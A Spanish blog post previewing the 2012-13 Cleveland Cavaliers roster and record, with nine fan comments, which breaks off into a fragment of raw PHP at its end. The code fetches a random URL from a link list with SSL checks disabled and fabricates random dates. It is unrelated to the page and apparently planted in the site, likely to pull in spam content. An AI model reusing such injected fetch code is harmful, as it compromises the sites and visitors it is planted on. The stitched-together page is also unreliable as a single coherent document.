Cleveland Cavaliers: Sin prisa

09 de October de 2012 por Viva_Dirk

Decir que los Cavs de esta campaña no son un gran equipo es una obviedad, pero no mucha gente se está fijando en lo bien que están actuando tras la salida de Lebron. Después de un palo así muchos dirigentes se habrían lanzado a por una pseudoestrella firmándole un contrato bestial, habrían llenado el equipo de jugadores con cierta experiencia que les permitieran luchar por play-offs o habrían sacrificado piezas válidas con el objetivo de una reconstrucción tan brutal como rápida. Los Cavs no han hecho nada de eso. Están haciendo algo que parece sencillo pero que es muy difícil ver en la NBA y en el deporte profesional en general: están teniendo paciencia.

Kyrie Irving sigue con el mando del equipo tras una gran temporada como rookie. El equipo es suyo como antes fuera de Lebron y nadie lo discute, algo que le va a dar mas confianza para desarrollar sus tremendas habilidades que lo sitúan desde ya mismo en la élite de bases de la liga. Otros jóvenes como Dion Waiters y Tristan Thompson van a tener también protagonismo a raudales. Ambos son dos apuestas fuertes de la franquicia en el draft y se ha actuado en consecuencia. Apenas tienen competencia en sus puestos y si no demuestran de que pasta están hechos no será por las trabas que vean en su camino. Estos 3 son los nombres propios de Cleveland para los próximos años. Los resultados siguen importando poco este año aunque visto el nivel de Irving si el resto de jugadores da la talla podrían no estar muy lejos de los play-offs del Este.

Anderson Varejao es el ‘veterano’ de los titulares. Con 30 años recién cumplidos este guerrero de las pistas se adapta perfectamente a cualquier circunstancia. El año pasado estaba llevando a cabo una buena temporada hasta que una lesión lo apartó de las pistas. En esta versión de equipo el alero titular debería ser Alonzo Gee, un jugador muy dinámico que puede complementar muy bien a la pareja exterior, capacitado físicamente para defender a cualquiera y para el juego a campo abierto.

Omri Casspi y CJ Miles pelearán por el puesto de sexto hombre. Ambos son suplentes aceptables para cualquier equipo. Casspi ha decepcionado después de un gran año rookie pero es joven y Miles lleva 7 años en la liga siendo lo que es, un tirador que puede dar un buen nivel defensivo. Daniel Gibson será el recambio de Irving y ocupará la posición de escolta cuando lo requiera la situación. Tyller Zeller será el primer recambio del juego interior. Estrella universitaria de las que se suele dudar de cara a la NBA, un 7 pies blanco con buena mano, buen reboteador y de gran personalidad. Aa a tener un papel importante pero sin mucha presión, otro punto a favor de la gestión de la plantilla. El otro puesto del juego interior es para Jon Leuer que tras un primer año aceptable en los Bucks va a tener la oportunidad de demostrar que tiene un hueco en la liga.

El equipo lo completan nombres como Samardo Samuels, Luke Harangody, Luke Walton y rookies de menor importancia que no deberían disfrutar de demasiados minutos. Hay un elemento extraño que no hemos nombrado y que no es Robert Horry. Se trata de Kelenna Azubuike. Por lo visto en los últimos años no podemos esperar nada de él ya que su físico está muy mermado pero en buenas condiciones bien podría ser el primer suplente del juego exterior.

Nos encontramos a un equipo repleto de jóvenes con ganas de demostrar cosas, mezclado con algunos buenos jugadores y dirigidos por un gran técnico como Byron Scott que pondrán todo lo que tienen en prácticamente cada partido. Si la temporada empieza bien para ellos no me extrañaría verlos luchando por play-offs hasta el último día.

Quinteto: Kyrie Irving – Dion Waiters – Alonzo Gee – Tristan Thompson – Anderson Varejao
Sexto hombre: CJ Miles/Casspi

Pronóstico: 35-40 victorias peleando play-offs

Comenta

9 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Yo les doy 25-57. Cierto es que el año pasado esutvieron varios meses cerca de Playoffs. El lockout les benefició, pues les quitó dos meses de competición donde hubieran tenido partidos difíciles. En enero y febero jugaron bastante bien contra equipos del royo de Pistons, Bucks, Bobcats, etc. y en algunos momentos se pusieron séptimos u octavos, pero en cuanto empezaron a jugar contra los cocos se vinieron abajo. No sé, no creo que sea muy importante la actuación grupal de estos Cavaliers, aunque sí sus actuaciones individuales. Tengo muchas ganas de ver a Irving su progresión como jugador de segundo año, me apetece también ver si Thompson se ha moderado y utiliza más la cabeza (es todo potencia sin control el zagalo), y a ver si Dion Waiters era el chuflo que muchos decían o en realidad es un jugador aprovechable. El juego de pívots mejora, pues de tener a Varejao el año pasado prácticamente en el dique seco, y saliendo Hollins a veces de titular hasta que fichó por Boston, a pasar a tener a Varejao con Zeller de suplente, con lo que promete este chaval. Esa pareja me apetece verla, y también me apetece ver a Casspi, que nadie sabe cómo estará, pero creo que el chaval el año pasado no hizo un pimiento porque estaba medio deprimido. Había sido muchos años novio de Bar Rafaeli, si mal no recuerdo, y luego la pava puso el modo Rihanna On y se tiró a todo lo que piyó… Una lástima, porque Casspi tiene calidad. En los Kings lo demostró. No se arruga en momentos clave, tiene buena mano (mala cabeza y mala defensa), pero es un tirador muy efectivo si lo saben usar. También habría que destacar de los Cavaliers la retirada de Anthony Parker, todo un jugón. Inolvidable en Maccabi, y con una decente carrera NBA. Un jugador que dejará su recuerdo seguramente, sobre todo en Europa.

      Citar

  2. Denise dice:
    #2

    Sancho88: Había sido muchos años novio de Bar Rafaeli, si mal no recuerdo, y luego la pava puso el modo Rihanna On y se tiró a todo lo que piyó… Una lástima, porque Casspi tiene calidad. .

    Sancho, periodicamente deberias hacer una Cronica en Rosa como las de Daimiel contandonos los puterios y entresijos que rodean a los jugadores NBA.
    Los que no tenemos tiempo para leer el Pronto y el Hola en versión americana te lo agradeceriamos 🙂

      Citar

  3. Denise dice:
    #3

    Ante todo, reconozco mi animadversión a este equipo, que tradicionalmente me ha aburrido; y ademas entre lo garrulo y paleto que me parece la afición pitando a James; el payaso del GM con aquella carta y esa frase lapidaria de que los Cavs ganarían el anillo antes que Lebron; y el regalito a Lakers de Sessions por Walton.; mi objetividad en el analisis puede verse mermada.

    El equipo, salvo que los nuevos rookies sean buenacillos; me parece infumable. No creo que haya sido tan buena la reconstrucción del equipo post Lebron. Por lo demas, solo Irving y Varejao son 2 piezas utiles en cualquier equipo, Gee es aceptable para un equipo perdedor como los Cavs; y Tristan Thompson me pareció un bluff el año pasado, aunque todavía tendrá margen. Lo demas pfff infumable todo.

    Pronóstico: espero que sean el peor quipo de la NBA, con balance de 24-58. No oleran los Playoffs ni de lejos.

      Citar

  4. Esteban dice:
    #4

    a mi tampoco me ha convencido la reconstruccion sin lebron, yo hubiese esperado un añop mas a valanciunas y este año no debaja escaspar a barnes de ni loco

    pero bueno, tan mal no esta, tienen 4 jovenes, irving, waiters, thompson y zeller, y mucho espacio, si estos 4 muchachos funcionan bien, tienen un base solida para sumar a futuro un alero estrella, lebron? mucho pedir, pero granger o gay para ayudar a estos jovenes podrian funcionar

      Citar

  5. nba dice:
    #5

    La franquicia tiene paciencia, porque otra cosa no puede tener, hay que recordar que Jamison no esta tampoco, por lo que parece que va a ser un año duro para estos, y si consiguen quedar justo detras de los Bucks ya seria un gran año.

      Citar

  6. melo15 dice:
    #6

    Me dan mala pinta estos Cavs, creo que se equivocaron con sus elecciones del Draft. Thompson creo que se quedara en role player y Waiter sera un bluff… tampoco me convence Zeller, que de 4 no lo haria mal pero de 5 le faltan muchos kilos y de 4 mucha movilidad.

      Citar

  7. Esteban dice:
    #7

    melo15:
    Me dan mala pinta estos Cavs, creo que se equivocaron con sus elecciones del Draft. Thompson creo que se quedara en role player y Waiter sera un bluff… tampoco me convence Zeller, que de 4 no lo haria mal pero de 5 le faltan muchos kilos y de4 mucha movilidad.

    yo creo lo mismo, han apostado contra todo pronostico por thompson y por waiters… ya dije, me quedaba esperando a valanciunas y este año escogia a barnes, creo que ahi si tendrian mimbres de sobra

    lo de thompson, bue es atletico y muy muy joven, cuidado q puede super explotar, pero por el momento no se le ve mayor chapa, aunque algo parecido paso y sigue pasando con un derrick favors decepcionante al inicio y cada vez mejor

    waiters, es de los primeros 10 pick, quiza el que menos me gusta, por fisico, calidad y potencial lo veo como mucho de sexto hombre, estara en el cerrarme la boca

    como dije si los planetas se alinean y ellos dos mas zeller e irving pueden hacer un nucleo suficientemente bueno para tentar en 2014 a JAMES…

    soñar es gratis

      Citar

  8. TheDeerHunter dice:
    #8

    Yo tengo especial interés en ver cómo salen sus rookies. No soy un experto, pero por circunstancias he seguido algunos perfiles y Dion Waiters es uno de ellos. Yo diría que lo va a hacer bien desde casi el inicio.
    Yo no los veo tan malos. Diría que pueden sobrepasar las 30 victorias sin grandes problemas. Mucho más será difícil incluso en el Este.

      Citar

  9. GreenPride dice:
    #9

    Equipo muy joven que claramente aspira a que sus jugadores jóvenes acumulen minutos y experiencia y a coger buena posición en el próximo draft. Si lo consiguen espero que elijan mejor que este año donde sus elecciones han sido bastante dudosas. Si todos los jóvenes funcionan bien pueden estar sobre las 35-40 victorias pero eso lo veo difícil y yo diría que se quedarán sobre las 30 o así. Años de transición y de buscar una nueva identidad

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>